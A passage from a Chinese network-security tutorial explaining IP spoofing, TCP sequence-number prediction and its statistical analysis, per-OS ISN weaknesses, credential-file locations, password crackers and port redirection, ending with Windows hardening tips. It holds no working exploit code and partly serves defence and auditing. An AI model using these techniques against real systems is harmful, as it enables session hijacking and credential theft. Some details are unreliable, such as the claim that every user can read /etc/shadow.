　　即使服务器设置了密码的过期策略和锁定，攻击者还是可以利用NAT反复尝试登录来骚扰管理员。通过简单地锁定所有已知的账号，攻击者会极大地影响服务器的访问，这也是一些系统管理员不强行锁定账号的原因。

　　较弱的系统策略

　　到此为止，你已经学习了一些外部攻击。然而，对于管理员来说最紧迫的是大多数公司都存在不好的安全策略。如果安全策略很弱或干脆没有安全策略，通常会导致弱的密码和系统策略。通常，公司并不采取简单的预防措施，比如需要非空的或有最小长度要求的密码。忽略这些限制会给攻击者留下很大的活动空间。

　　审计文件系统漏洞

　　不论你的操作系统采取何种文件系统（FAT，NTFS或NFS），每种系统都有它的缺陷。例如，缺省情况下NTFS在文件夹和共享创建之初everyone组可完全控制。由于它是操作系统的组成部分（Windows NT），因此也成为许多攻击的目标。NFS文件系统可以共享被远程系统挂接，因此这也是攻击者入侵系统的途径之一。

　　IP欺骗和劫持：实例

　　IP欺骗是使验证无效的攻击手段之一，也是如何组合攻击策略攻击网络的典型实例。IP欺骗利用了Internet开放式的网络设计和传统的建立在UNIX操作系统之间信任关系。主要的问题是使用TCP/IP协议的主机假设所有从合法IP地址发来的数据包都是有效的。攻击者可以利用这一缺陷，通过程序来发送虚假的IP包，从而建立TCP连接，攻击者可以使一个系统看起来象另一个系统。

　　许多UNIX操作系统通过rhosts和rlogin在非信任的网络上（如Internet）建立信任的连接。这种传统的技术是流行的管理工具并减轻了管理负担。通常，这种系统由于把UNIX的验证机制和IP地址使用相结合从而提供了适当的安全。然而，这种验证机制是如此的独立于IP地址不会被伪造的假设，以至于很容易被击破。

　　Non-blind spoofing 和Blind spoofing

　　Non-blind spoofing是指攻击者在同一物理网段上操纵连接。Blind spoofing是指攻击者在不同的物理网段操纵连接。后者在实施上更困难，但也时常发生。

　　进行IP欺骗的攻击者需要一些程序，包括：

　　· 一个包嗅探器

　　· 一个能够同时终止TCP连接、产生另一个TCP连接、进行IP 伪装的程序

　　IP欺骗涉及了三台主机。像先前分析的那样，使用验证的服务器必须信任和它建立连接的主机。如果缺乏天生的安全特性，欺骗是非常容易的。

　　思考下列的场景，有三台主机分别是A,B和C。A使用TCP SYN连接与合法用户B初始一个连接。但是B并没有真正参与到这次连接中，因为C已经对B实施了拒绝服务攻击。所以，虽然A认为是在与B对话，但实际上是与C对话。IP欺骗实际上组合了几种攻击手法包括对系统实施了拒绝服务攻击，还包括利用验证技术。

　　作为审计人员，你不应该说服管理员终止这种信任关系，相反，你应当建议使用防火墙规则来检测有问题的包。

TCP/IP序列号生成方法

　　TCP的Initial Sequence Number（ISN）的预测

　　正常的TCP连接基于一个三次握手（3-way handshake），一个客户端（Client）向服务器（Server）发送一个初始化序列号ISNc， 随后，服务器相应这个客户端ACK（ISNc）,并且发送自己的初始化序列号ISNs，接着，客户端响应这个ISNs（如下图），三次握手完成。

　　 C —〉S: （ISNc）

　　 S —〉C: ACK（ISNc）+ ISNs

　　 C —〉S: ACK（ISNs）

　　 C —〉S: data

　　 and / or

　　 S —〉C: data

　　下面，我以Windows2000 Advanced Server为例，来说一下两台主机是如何进行三次握手。

　　我们可以看到：

　　1） Smartboy首先发送一个seq:32468329的包给服务器202.116.128.6。

　　2） 然后, 202.116.128.6响应主机Smartboy, 它送给Smartboy自己的

　　 seq:3333416325 而且响应Smartboy的ack:3240689240。

　　3） Smartboy再响应服务器202.116.128.6, seq:3240689240, ack:3333416326。

　　 三次握手完毕，两台几建立起连接。

　　 可以看出，在三次握手协议中，Clinet一定要监听服务器发送过来的ISNs, TCP使用的sequence number是一个32位的计数器，从0-4294967295。TCP为每一个连接选择一个初始序号ISN，为了防止因为延迟、重传等扰乱三次握手，ISN不能随便选取，不同系统有不同算法。理解TCP如何分配ISN以及ISN随时间变化的规律，对于成功地进行IP欺骗攻击很重要。

　　在Unix系统里，基于远程过程调用RPC的命令，比如rlogin、rcp、rsh等等，根据/etc/hosts.equiv以及$HOME/.rhosts文件进行安全校验，其实质是仅仅根据源IP地址进行用户身份确认，以便允许或拒绝用户RPC。这就给与了那些攻击者进行IP地址欺骗的机会。

　　 让我们看X是如何冒充T来欺骗S，从而建立一个非法连接 ：

　　 X—->S: SYN（ISNx ） , SRC = T

　　 S—->T: SYN（ISNs ） , ACK（ISNT） （*）

　　 X—->S: ACK（ISNs+1 ） , SRC = T （**）

　　 X—->S: ACK（ISNs +1） , SRC = T, 攻击命令（可能是一些特权命令）

　　 但是，T必须要在第（**）中给出ISNs, 问题是ISNs在第（*）步中发给了T（X当然很难截取到），幸运的是，TCP协议有一个约定: ISN变量每秒增加250,000次，这个增加值在许多版本比较旧的操作系统中都是一个常量，在FreeBSD4.3中是125000次每秒，这就给X一个可乘之机。

(本章完)

[(第43章 网络安全知识（4）)]

看一下X是如何猜出ISNs :　

　　 a、首先，　X发送一个SYN包来获取服务器现在的ISNs

　　　　 X —〉S: （ISNx）

　　　　 S —〉X: ACK（ISNx）+ ISNs# （1）

　　 b、紧接着，X冒充T向服务器发送SYN包

　　　　 　　 X —〉S: SYN（ISNx ） , SRC = T （2）

　　 c、于是，服务器发出一个响应包给T（这个包X是收不到的）

　　　　 S —〉T: SYN（ISNs$） , ACK（ISNT ） （3）

　　 d、X计算ISNs$:

　　　　　ISNs$　=　ISNs#　+ RTT×Increment of ISN　（4）

　　其中，RTT（Round Trip Time）,是一个包往返X和S所用的时间,可以通过Ping 来得到。

　　上图显示了round trip times （RTT） 大概是０。

　　Increment of ISN是协议栈的初始序列号每秒钟增加的值，以Unix为例，当没有外部连接发生时，服务器的ISN每秒增加128,000,有连接的时候，服务器的ISN每秒增加64,000。

　　 e、于是，

　　　　X —> S : ACK（ISNs$） 　　（冒充可信主机成功了）

　　　　X —> S : 恶意的命令或窃取机密消息的命令

　　在评价以下的解决方案时有几点要注意：

　　1.该解决方案是否很好地满足TCP的稳定性和可操作性的要求？

　　2.该解决方案是否容易实现?

　　3.该解决方案对性能的影响如何?

　　4.该解决方案是否经得起时间的考验？

　　以下的几种方案各有各的优点和缺点，它们都是基于增强ISN生成器的目标提出的。

　　配置和使用密码安全协议

　　TCP的初始序列号并没有提供防范连接攻击的相应措施。TCP的头部缺少加密选项用于强加密认证，于是，一种叫做IPSec的密码安全协议的技术提出了。IPSec提供了一种加密技术（End to end cryptographic），使系统能验证一个包是否属于一个特定的流。这种加密技术是在网络层实现的。其它的在传输层实现的解决方案（如SSL/TLS和SSH1/SSH2）, 只能防止一个无关的包插入一个会话中，但对连接重置（拒绝服务）却无能为力，原因是因为连接处理是发生在更低的层。IPSec能够同时应付着两种攻击（包攻击和连接攻击）。它直接集成在网络层的安全模型里面。

　　上面的解决方案并不需要对TCP协议做任何得修改，RFC2385（”基于TCP MD5签名选项的BGP会话保护）和其他的技术提供了增加TCP头部的密码保护，但是，却带来了收到拒绝服务攻击和互操作性和性能方面的潜在威胁。使用加密安全协议有几个优于其它方案的地方。TCP头部加密防止了Hijacking和包扰乱等攻击行为，而TCP层仍然能够提供返回一个简单增加ISN的机制，使方案提供了最大程度的可靠性。但实现IPSec非常复杂，而且它需要客户机支持，考虑到可用性，许多系统都选择使用RFC 1948。

　　使用RFC1948

　　在RFC1948中，Bellovin提出了通过使用4-tuples的HASH单向加密函数，能够使远程攻击者无从下手（但不能阻止同一网段的攻击者通过监听网络上的数据来判断ISN）。

　　Newsham 在他的论文 [ref_newsham]中提到:

　　RFC 1948 [ref1]提出了一种不容易攻击（通过猜测）的TCP ISN的生成方法。此方法通过连接标识符来区分序列号空间。每一个连接标识符由本地地址，本地端口，远程地址，远程端口来组成，并由一个函数计算标识符分的序列号地址空间偏移值（唯一）。此函数不能被攻击者获得，否则，攻击者可以通过计算获得ISN。于是，ISN就在这个偏移值上增加。ISN的值以这种方式产生能够抵受上面提到的对ISN的猜测攻击。

　　一旦全局ISN空间由上述方法来生成，所有的对TCP ISN的远程攻击都变得不合实际。但是，需要指出的，即使我们依照RFC 1948来实现ISN的生成器，攻击者仍然可以通过特定的条件来获得ISN（这一点在后面叙述）.

　　另外，用加密的强哈希算法（MD5）来实现ISN的生成器会导致TCP的建立时间延长。所以，有些生成器（如Linux　kernel ）选择用减少了轮数的MD4函数来提供足够好的安全性同时又把性能下降变得最低。削弱哈希函数的一个地方是每几分钟就需要对生成器做一次re-key 的处理，经过了一次re-key的处理后，安全性提高了，但是，RFC793提到的可靠性却变成另一个问题。

　　我们已经知道，严格符合RFC1948的ISN生成方法有一个潜在的危机：

　　一个攻击者如果以前合法拥有过一个IP地址，他通过对ISN进行大量的采样，可以估计到随后的ISN的变化规律。在以后，尽管这个IP地址已经不属于此攻击者，但他仍然可以通过猜测ISN来进行IP欺骗。

　　以下，我们可以看到RFC 1948的弱点:

　　ISN = M + F（sip, sport, dip, dport,

　　）

　　其中

　　ISN 32位的初始序列号

　　M 单调增加的计数器

　　F 单向散列哈希函数 （例如 MD4 or MD5）

　　sip 源IP地址

　　sport 源端口

　　dip 目的IP地址

　　dport 目的端口

　　哈希函数可选部分，使远程攻击者更难猜到ISN.

　　ISN自身的值是按照一个常数值稳定增加的,所以F（）需要保持相对的稳定性。而根据Bellovin 所提出的，是一个系统特定的值（例如机器的启动时间，密码，初始随机数等），这些值并不 会经常变。

　　但是，如果Hash函数在实现上存在漏洞（我们无法保证一个绝对安全的Hash函数，况且，它的实现又与操作系统密切相关），攻击者就可以通过大量的采样，来分析，其中，源IP地址，源端口，目的IP地址，目的端口都是不变的，这减少了攻击者分析的难度。

　　Linux TCP的ISN生成器避免了这一点。它每５分钟计算一次值,把泄漏的风险降到了最低。

　　有一个办法可以做的更好：

　　取M = M + R（t）

　　ISN = M + F（sip, sport, dip, dport, ）

　　其中

　　R（t） 是一个关于时间的随机函数

　　很有必要这样做，因为它使攻击者猜测ISN的难度更大了（弱点在理论上还是存在的）。

其它一些方法

　　构造TCP ISN生成器的一些更直接的方法是：简单地选取一些随机数作为ISN。这就是给定一个32位的空间，指定　ISN = R（t）。（假设R（）是完全的非伪随机数生成函数）

　　固然，对于完全随机的ISN值，攻击者猜测到的可能性是１／２32是，随之带来的一个问题是ISN空间里面的值的互相重复。这违反了许多RFC（RFC 793, RFC 1185, RFC 1323, RFC1948等）的假设—-ISN单调增加。这将对TCP协议的稳定性和可靠性带来不可预计的问题。

　　其它一些由Niels Provos（来自OpenBSD 组织）结合完全随机方法和RFC 1948解决方案：

　　ISN = （（PRNG（t）） << 16） + R（t）　　　　 ３２位

　　其中

　　PRNG（t） ：一组随机指定的连续的１６位数字　　0x00000000 — 0xffff0000

　　R（t） ：16位随机数生成器（它的高位msb设成０）0x00000000 — 0x0000ffff

　　上面的公式被用于设计OpenBsd的ISN生成器，相关的源代码可以从下面的网址获得

http://www.openbsd.org/cgi-bin/cvsweb/src/…inet/tcp_subr.c

　　Provos的实现方法有效地生成了一组在给定时间内的不会重复的ISN的值，每两个ISN值都至少相差32K,这不但避免了随机方法造成的ISN的值的冲突，而且避免了因为哈希函数计算带来的性能上的下降，但是，它太依赖于系统时钟，一旦系统时钟状态给攻击者知道了，就存在着系统的全局ISN状态泄密的危机。

　　TCP ISN生成器的构造方法的安全性评估

　　ISN与PRNGs（伪随机数生成器）

　　我们很难用一台计算机去生成一些不可预测的数字，因为，计算机被设计成一种以重复和准确的方式去执行一套指令的机器。所以，每个固定的算法都可以在其他机器上生成同样的结果。如果能够推断远程主机的内部状态，攻击者就可以预测它的输出；即使不知道远程主机的PNRG函数，但因为算法最终会使ISN回绕，按一定的规律重复生成以前的ISN,所以，攻击者仍然可以推断ISN。幸运的是，目前条件下，ISN的重复可以延长到几个月甚至几年。但是，仍然有部分PRNG生成器在产生500个元素后就开始回绕。解决伪随机数的方法是引入外部随机源，击键延时，I/O中断，或者其它对攻击者来说不可预知的参数。把这种方法和一个合理的HASH函数结合起来，就可以产生出32位的不可预知的TCP ISN的值，同时又隐蔽了主机的PNRG的内部状态。不幸的是，很少的TCP ISN产生器是按这种思路去设计的，但即使是这样设计的产生器，也会有很多的实现上的漏洞使这个产生器产生的ISN具有可猜测性。

　　RFC1948的建议提供了一种比较完善的方法，但是，对攻击者来说，ISN仍然存在着可分析性和猜测性。其中，PRNG的实现是个很关键的地方。

网络安全知识（5）

　　
 

(本章完)

[(第44章 网络安全知识（４－１）)]

Spoofing 集合

　　需要知道一点是，如果我们有足够的能力能够同时可以发出２32个包，每个包由不同的ISN值，那么，猜中ISN的可能性是100%。但是，无论从带宽或计算机的速度来说都是不实际的。但是，我们仍然可以发大量的包去增加命中的几率，我们把这个发出的攻击包的集合称为Spoofing集合。通常，从计算机速度和网络数据上传速率两方面来考虑，含5000个包的Spoofing的集合对众多的网络用户是没有问题的，5000-60000个包的Spoofing集合对宽带网的用户也是不成问题的，大于60000个包的Spoofing集合则超出一般攻击者的能力。网络的速度和计算机性能的不断增加会提高那种使用穷尽攻击方法猜测ISN的成功率。从攻击者的立场，当然希望能够通过定制一个尽可能小的Spoofing集合，而命中的几率又尽可能高。我们假定我们攻击前先收集50000个包作为ISN值的采样，然后，我们把这些ISN用作对将来的ISN的值猜测的依据。

　　一种称为”delay coordinates”的分析方法

　　在动态系统和非线性系统中，经常使用一种叫做”delay coordinates”的分析法，这种方法使我们可以通过对以前的数据的采样分析来推想以后的数据。

　　我们试图以建立一个三维空间（x,y,z）来观察ISN值（seq[t]）的变化，其中t取0,1,2, ……

　　方程组（E1）

　　现在，对采样了的50000个ISN序列seq[t] 按照上面的三个方程式来构建空间模型A。这样，就可以通过A的图像特征来分析这个PNRG生成的ISN值的规律。Ａ呈现的空间模型的３D特性越强，它的可分析性就越好。

　　接着，我们根据这个模型，去分析下一个ISN值seq[t],为此，我们用一个集合K（5000个）去猜测seq[t]。

　　如果我们知道seq[t-1],要求seq[t],那么，可以通过在这个三维空间中找出一个有良好特性的节点P（x,y,z），将P.x+seq[t-1],我们就可以得到seq[t]。现在，我们将注意力放到怎样在这个三维空间中选择一些点来构成Spoofing集合，也就是怎样通过seq[t-1],seq[t-2],sea[t-3]来推知seq[t]。

　　由于seq[t-1],seq[t-2],seq[t-3]都可以很容易地在远程主机上探测到，于是，P.y和P.z可以通过以下的公式求出

　　而对于P.x=seq[t]-seq[t-1], 由于seq[t-1]已知，所以，我们可以把它当作是空间的一条直线。如果，在对以前的ISN的采样，通过上面提到的构成的空间模型A呈现某种很强的特征，我们就可以大胆地假设，seq[t]在直线与A的交点上,或者在交点的附近。这样，seq[t]就这样确定了，于是，seq[t+1],seq[t+2]……,我们都可以推断出来。

　　于是，我们大致将构造Spoofing集合分成3个步骤：　

　　先选取L与A交点之间的所有点。如果，L与A没有交点，我们则选取离L最近的A的部分点。

　　假设现在 seq[t-1]=25

　　 seq[t-2]=50

　　 seq[t-3]=88

　　 于是，我们可以计算出

　　 y = seq[t-1] – seq[t-2]=25

　　 z = seq[t-2] – seq[t-3]=33

　　而我们在集合A中找不到满足y=25,z=33这个点，但是，我们找到y=24,z=34和y=27,z=35这两个点，所以，我们要把它们加入Spoofing集合。

　　我们按照上面的方法，把在A附近（半径<=R1的空间范围内）点集M找出来，然后，我们根据这些点的相应的x值去推导相应的seq[t]（按照一定的算法，后面会提到）,于是，我们就得到很多的seq[t]。

　　根据点集M（j）,我们在一定的变化浮动范围U里（-R2<=U<=+R2）处理其x值，得出以下的集合K：

　　M（j）.x+1 M（j）.x-1 M（j）.x+2 M（j）.x-2 M（j）.x+3 M（j）.x-3 …… M（j）.x+R2 M（j）-R2

　　接着我们确定R1和R2的值

　　　　　　R1值的选取的原则：使M不为空集，一般为1-500个。

　　　　　　R2值的选取的原则：使K的个数为5000。

　　相关系数的意义：

　　R1 radius: 影响搜索速度。

　　R2 radius: 影响猜测ISN的成功率， R2越大，成功率越高，但代价越大。

　　Average error: 反映了在3.3.2中找出的点集的平均距离。一个过分大的平均距离是不需要的。可以通过是否有足够的正确的猜测值来计算Average error。

 

(本章完)

[(第45章 网络安全知识（5）)]

delay coordinates分析法的意义

　　站在攻击者的立场，他是千方百计地想缩小搜索空间，他希望先搜索一些最可能的值，然后再去搜索其它可能性没那么大的值。通过delay coordinates，他可以看去观察ISN数列的特征，如果，按照上面的方法构造的空间模型Ａ呈现很明显的空间轮廓，如一个正方体，一个圆柱体，或者一个很小的区域，那么ISN很可能就是这个空间模型Ａ中的一点，搜索空间就会可以从一个巨大的三维空间缩小到一个模型Ａ。看一下一个设计得很好的PRNG（输出为32位）：…2179423068, 2635919226, 2992875947, 3492493181, 2448506773, 2252539982, 2067122333, 1029730040, 335648555, 427819739…

　　RFC 1948要求我们用31位的输出，但是，32位的搜索空间比31位的要大一倍，所以，在后面的PRNG的设计中，我采用了32位的输出。

　　下面，我们来看一下各种典型的空间模型以及对它们的评价。

　　从空间特性可以看出，某些区域的值互相重叠，某些地方的空间形状很明显，呈针状型，这种PRNG设计得不好，重叠特性很强，攻击者可以从左图分析推断可能性比较大的重叠区域去搜索，这样可以大大减少搜索的难度。

　　这种PRNG参杂了一些可以预测的随机种子，导致空间模型呈现很明显的片状。攻击者可以根据前面的一些ISN来推测后面的ISN。

　　这种PRNG产生的随机数序列之间的差值非常小，但是，它的分布特性非常好。所以，虽然，它并没有扩展到整个空间，但是，它比上面几种模型要好的多。攻击者攻击的成功率要少得多。

　　这个PRNG是以计算机时钟为随机源的。它的ISN值都分布在三个很明显的面上。三个面都在模型的中间有一个汇聚点。这样的PRNG设计的非常差，所以，我们在设计PRNG的时候，不能只是以时钟作为随机源。

各种操作系统的TCP ISN生成器的安全性比较

　　Windwos 98 SE

　　但很难明白为什么Windows 98的算法更弱。我们看到R1为0，也就是说，A的空间特性太明显，以致M集只需要一个点就可以算出seq[t]。我们看到，Windows 98的R2小于Windows 95的R2，换言之，Windows 98的seq[t]的搜索代价更少。

　　Windows NT4 SP3，Windows SP6a和Windows 2000

　　Windows NT4 SP3在ISN的PNRG算法也是非常弱的，成功率接近100%。Windows 2000和Windows NT4 SP6a的TCP 序列号有着相同的可猜测性。危险程度属于中到高的范围。虽然，我们在图上看不到很明显的3D结构化特征，但是，12%和15%对攻击者来说，已经是一个很满意的结果。

　　FreeBSD 4.2,OpenBSD 2.8和OpenBSD-current

　　OpenBSD-current的PRNG 输出为31-bit,也就是说，△seq[t]的值域范围可以是231 –1，意味着,y,z值域也很大，这对使我们很难确定M集，经过我们的处理后，可以看到一个云状物（见上图），它的R1半径很大，而且分布均匀，不呈现任何的空间结构化特性，很难对它进行分析。

　　Linux 2.2

　　Linux 2.2的TCP/IP序列号的可分析性也是很少，比起OpenBSD-current,它的PRNG的输出宽度只有24bit，但是，对抵御攻击已经足够了。Linux是按照RFC 1948规范的。它的HASH函数从实现来说，应该是没有什么的漏洞，而且，它应该是引入了外部随机源。

　　Solaris

　　Solaris的内核参数tcp_strong_iss有三个值，当tcp_strong_iss=0时，猜中序列号的成功率是100%；当tcp_strong_iss=1时，Solaris 7和Solaris 8一样，都能产生一些特性相对较好的序列号。

　　tcp_strong_iss=2时，依据Sun Microsystem的说法，系统的产生的ISN值非常可靠，不可预测。通过观察采样值的低位值的变化，可以相信它的PRNG的设计采用了RFC 1948规范，正如Solaris的**所提到的。

　　但是，我们观察到，Solaris7（tcp_strong_iss=2）虽然使用了RFC 1948,但是，仍然相当的弱，究其原因，是因为Solaris没有使用外部随机源，而且也没有在一段时间之后重算

。由一些Solaris系统动态分配IP地址的主机群要特别小心，因为Solaris在启动之后，一直都不会变（这一点与Linux不同），于是，攻击者在合法拥有某个IP地址的时候，他可以在TCP会话期间对序列号进行大量的采样，然后，当这个IP地址又动态地分配给其他人的时候，他就可以进行攻击（在Clinet-Server结构的网络系统中要尤为注意，因为，许多应用都是分配固定的端口进行通讯）。

获得信息

　　一旦攻击者获得root的权限，他将立即扫描服务器的存储信息。例如，在人力资源数据库中的文件，支付账目数据库和属于上层管理的终端用户系统。在进行这一阶段的控制活动时，攻击者在脑海中已经有明确的目标。这一阶段的信息获取比侦查阶段的更具有针对性，该信息只会导致重要的文件和信息的泄漏。这将允许攻击者控制系统。

　　攻击者获得信息的一种方法是操纵远程用户的Web浏览器。大多数的公司并没有考虑到从HTTP流量带来的威胁，然而，Web浏览器会带来很严重的安全问题。这种问题包括Cross-frame browsing bug和Windows spoofing以及Unicode等。浏览器容易发生缓冲区溢出的问题，允许攻击者对运行浏览器的主机实施拒绝服务攻击。一旦攻击者能够在局部使系统崩溃，他们便可以运行脚本程序来渗透和控制系统。

　　Cross-frame browsing bug允许怀有恶意的Web站点的制作者创建可以从用户计算机上获得信息的Web页面。这种情况出现在4.x和5.x版本的Netscape和Microsoft浏览器上，这种基于浏览器的问题只会发生在攻击者已经知道文件和目录的存储位置时。这种限制看起来不严重，但实际上并非如此。其实，任何攻击者都清楚地知道缺省情况下UNIX操作系统的重要文件存放在（\etc）目录下，Windows NT的文件在（\winnt）目录下，IIS在（\inetpub\wwwroot）目录下等等。

(本章完)

[(第46章 网络安全知识（6）)]

大多数的攻击者都知道操作系统存放文件的缺省位置。如果部门的管理者使用Windows98操作系统和Microsoft Word, Excel或Access，他很可能使用\deskto\My documents目录。攻击者同样知道\windows\start\menu\programs\startup目录的重要性。攻击者可能不知道谁在使用操作系统或文件和目录的布局情况。通过猜测电子表格，数据库和字处理程序缺省存储文件的情况，攻击者可以轻易地获得信息。

　　虽然攻击者无法通过浏览器控制系统，但这是建立控制的第一步。利用Cross-frame browsing bug获得的信息要比从网络侦查和渗透阶段获得的信息更详细。通过阅读文件的内容，攻击者会从服务器上获得足够的信息，要想阻止这种攻击手段，系统管理员必须从根本上重新配置服务器。

　　审计UNIX文件系统

　　Root kit充斥在互联网上，很难察觉并清除它们。从本质上来说，root kit是一种木马。大多数的root kit用各种各样的侦查和记录密码的程序替代了合法的ls，su和ps程序。审计这类程序的最好方法是检查象ls, su和ps等命令在执行时是否正常。大多数替代root kit的程序运行异常，或者有不同的的文件大小。在审计UNIX系统时，要特别注意这些奇怪的现象。下表1列出了常见的UNIX文件的存放位置。

文件名

存放位置

/

根目录

/sbin

管理命令

/bin

用户命令；通常符号连接至/usr/bin

/usr

大部分操作系统

/usr/bin

大部分系统命令

/usr/local

本地安装的软件包

/usr/include

包含文件（用于软件开发）

/usr/src

源代码

/usr/local/src

本地安装的软件包的源代码

/usr/sbin

管理命令的另一个存放位置

/var

数据（日志文件，假脱机文件）

/vr/log

日志文件

/export

被共享的文件系统

/home

用户主目录

/opt

可选的软件

/tmp

临时文件

/proc

虚拟的文件系统，用来访问内核变量

　　审计Windows NT

　　下列出了在Windows NT中通常文件的存放位置

文件名

位置

\winnt

系统文件目录；包含regedit.exe和注册表日志

\winnt\system32

包含许多子目录，包括config（存放security.log，event.log和application.log文件）

\winnt\profiles

存放与所有用户相关的信息，包括管理配置文件

\winnt\system32\config

包含SAM和SAM.LOG文件，NT注册表还包含密码值

\inetpub

缺省情况下，包含IIS4.0的文件，包括\ftproot,\wwwroot

\program files

服务器上运行的大多数程序的安装目录

　　L0phtCrack工具

　　L0phtCrack被认为是对系统攻击和防御的有效工具。它对于进行目录攻击和暴力攻击十分有效。它对于破解没有使用像！@#￥％^&*（）等特殊字符的密码非常迅速。L0phtCrack可以从http://www.l0pht.com上获得。

　　L0pht使用文字列表对密码进行字典攻击，如果字典攻击失败，它会继续使用暴力攻击。这种组合可以快速获得密码。L0pht可以在各种各样的情况下工作。你可以指定IP地址来攻击Windows NT系统。然而，这种方式需要首先登录到目标机器。L0pht还可以对SAM数据库文件进行攻击。管理员从\winnt\repair目录拷贝出SAM账号数据库。第三中方式是配置运行L0pht的计算机嗅探到密码。L0pht可以监听网络上传输的包含密码的会话包，然后对其进行字典攻击。这种方式使用L0pht需要在类似Windows NT这样的操作系统之上，并且你还需要物理地处于传输密码的两个操作系统之间。

　　John the Ripper和Crack是在基于UNIX的操作系统上常见的暴力破解密码的程序。这两个工具被用来设计从UNIX上获取密码。所有版本的UNIX操作系统都将用户账号数据库存放在/etc/passwd或/etc/shadow文件中。这些文件在所有UNIX系统中存放在相同的位置。为了使UNIX正常运行，每个用户都必须有读取该文件的权限。

　　John the Ripper和Crack是最常见的从shadow和passwd文件中获得密码的程序。这些工具将所有的密码组合与passwd或shadow文件中加密的结果进行比较。一旦发现有吻合的结果就说明找到了密码。

　　在你审计UNIX操作系统时，请注意类似的问题。虽然许多扫描程序，如NetRecon和ISS Internet Scanner可以模仿这种工具类型，许多安全专家还是使用像L0pht和John the Ripper来实施审计工作。

　　信息重定向

　　一旦攻击者控制了系统，他便可以进行程序和端口转向。端口转向成功后，他们可以操控连接并获得有价值的信息。例如，有些攻击者会禁止像FTP的服务，然后把FTP的端口指向另一台计算机。那台计算机会收到所有原来那台主机的连接和文件。

　　相似的攻击目标还包括重定向**TP端口，它也允许攻击者获得重要的信息。例如，攻击者可以获得所有使用**TP来传送E-mail账号的电子商务服务器的信息。即使这些传输被加密，攻击者还是可以获得这些传输的信息并用字典攻击这些信息。

　　通常，攻击者渗透你的操作系统的目的是通过它来渗透到网络上其它的操作系统。例如，NASA服务器是攻击者通常的攻击目标，不仅因为他们想要获取该服务器上的信息，更主要的是许多组织都和该服务器有信任的连接关系，比如Department of Defense。

　　因此，许多情况下，攻击者希望攻击其它的系统。为了防止类似的情况发生，美国政府要求那些直接连到政府部门的公司必须按照Rainbow Series的标准来实施管理。从1970年开始，该系列标准帮助系统确定谁可以安全的连接。这个系列中最长被使用的是Department of Defense Trusted Computer System Evaluation Criteria，该文件被成为Orange Book。例如，C2标准是由Orange Book衍生出来并被用来实施可以信任的安全等级。这个等级是C2管理服务（C2Config.exe）在Microsoft NT的服务补丁基础上提供的。

　　控制方法

　　新的控制方法层出不穷，原因有以下几个。首先是因为系统的升级不可避免的会开启新的安全漏洞，二是少数黑客极有天赋，他们不断开发出新的工具。大多数的UNIX操作系统都有C语言的编译器，攻击者可以建立和修改程序。这一部分讨论一些允许你控制系统的代表性程序。

　　系统缺省设置

　　缺省设置是指计算机软硬件”Out-of-the-box”的配置，便于厂商技术支持，也可能是因为缺乏时间或忽略了配置。攻击者利用这些缺省设置来完全控制系统。虽然改变系统的缺省设置非常容易，但许多管理员却忽视了这种改变。其实，改变缺省设置可以极大地增强操作系统的安全性。

　　合法及非法的服务，守护进程和可装载的模块

　　Windows NT运行服务，UNIX运行守护进程，Novell操作系统运行可装载的模块。这些守护进程可以被用来破坏操作系统的安全架构。例如，Windows NT的定时服务以完全控制的权限来执行。如果用户开启了定时服务，他就有可能运行其它的服务，（例如，域用户管理器），从而使用户更容易控制系统

 

(本章完)

[(第47章 防范非系统用户破坏)]

第一招：屏幕保护

在Windows中启用了屏幕保护之后，只要我们离开计算机（或者不操作计算机）的时间达到预设的时间，系统就会自动启动屏幕保护程序，而当用户移动鼠标或敲击键盘想返回正常工作状态时，系统就会打开一个密码确认框，只有输入正确的密码之后才能返回系统，不知道密码的用户将无法进入工作状态，从而保护了数据的安全。

提示：部分设计不完善的屏幕保护程序没有屏蔽系统的”Ctrl+Alt+Del”的组合键，因此需要设置完成之后测试一下程序是否存在这个重**ug。

不过，屏幕保护最快只能在用户离开1分钟之后自动启动，难道我们必须坐在计算机旁等待N分钟看到屏幕保护激活之后才能再离开吗？其实我们只要打开Windows安装目录里面的system子目录，然后找到相应的屏幕保护程序（扩展名是SCR），按住鼠标右键将它们拖曳到桌面上，选择弹出菜单中的”在当前位置创建快捷方式”命令，在桌面上为这些屏幕保护程序建立一个快捷方式。此后，我们在离开计算机时双击这个快捷方式即可快速启动屏幕保护。

第二招：巧妙隐藏硬盘

在”按Web页”查看方式下，进入Windows目录时都会弹出一句警告信息，告诉你这是系统文件夹如果”修改该文件夹的内容可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，这时单击”显示文件”就可以进入该目录了。原因是在Windows根目录下有desktop.ini和folder.htt两个文件作祟。将这两个文件拷贝到某个驱动器的根目录下（由于这两个文件是隐藏文件，之前必须在文件夹选项中单击”查看”标签，选择”显示所有文件”，这样就可以看见这两个文件了）。再按”F5″键刷新一下，看看发生了什么，是不是和进入Windows目录时一样。

接下来我们用”记事本”打开folder.htt，这是用HTML语言编写的一个文件，发挥你的想像力尽情地修改吧。如果你不懂HTML语言也没关系，先找到”显示文件”将其删除，找到”修改该文件夹的内可能导致程序运行不正常，要查看该文件夹的内容，请单击显示文件”，将其改为自己喜欢的文字，例如”安全重地，闲杂人等请速离开”（如图1），将”要查看该文件夹的内容，请单击”改为”否则，后果自负!”，接着向下拖动滑块到倒数第9行，找到”（file&://%TEMPLATEDIR%＼wvlogo.gif）”这是显示警告信息时窗口右下角齿轮图片的路径，将其改为自己图片的路径，例如用”d:＼tupian＼tupian1.jpg”替换”//”后面的内容，记住这里必须将图片的后缀名打出，否则将显示不出图片。当然，你还可以用像Dreamweaver、FrontPage这样的网页工具做出更好的效果，然后只要将原文件拷贝到下面这段文字的后面，覆盖掉原文件中”～”之间的内容就可以了。

*This file was automatically generated by Microsoft Internet EXPlorer 5.0

*using the file %THISDIRPATH%＼folder.htt.

保存并退出，按”F5″键刷新一下，是不是很有个性?接下来要作的就是用”超级兔子”将你所要的驱动器隐藏起来，不用重新启动就可以欣赏自己的作品了。最后告诉大家一招更绝的，就是干脆将folder.htt原文件中”～”之间的内容全部删除，这样就会给打开你的驱动器的人造成一种这是一个空驱动器的假象，使其中的文件更安全。

第三招：禁用”开始”菜单命令

在Windows 2000/XP中都集成了组策略的功能，通过组策略可以设置各种软件、计算机和用户策略在某种方面增强系统的安全性。运行”开始→运行”命令，在”运行”对话框的”打开”栏中输入”gpedit.msc”，然后单击”确定”按钮即可启动Windows XP组策略编辑器。在”本地计算机策略”中，逐级展开”用户配置→管理模板→任务栏和开始菜单”分支，在右侧窗口中提供了”任务栏”和”开始菜单”的有关策略。

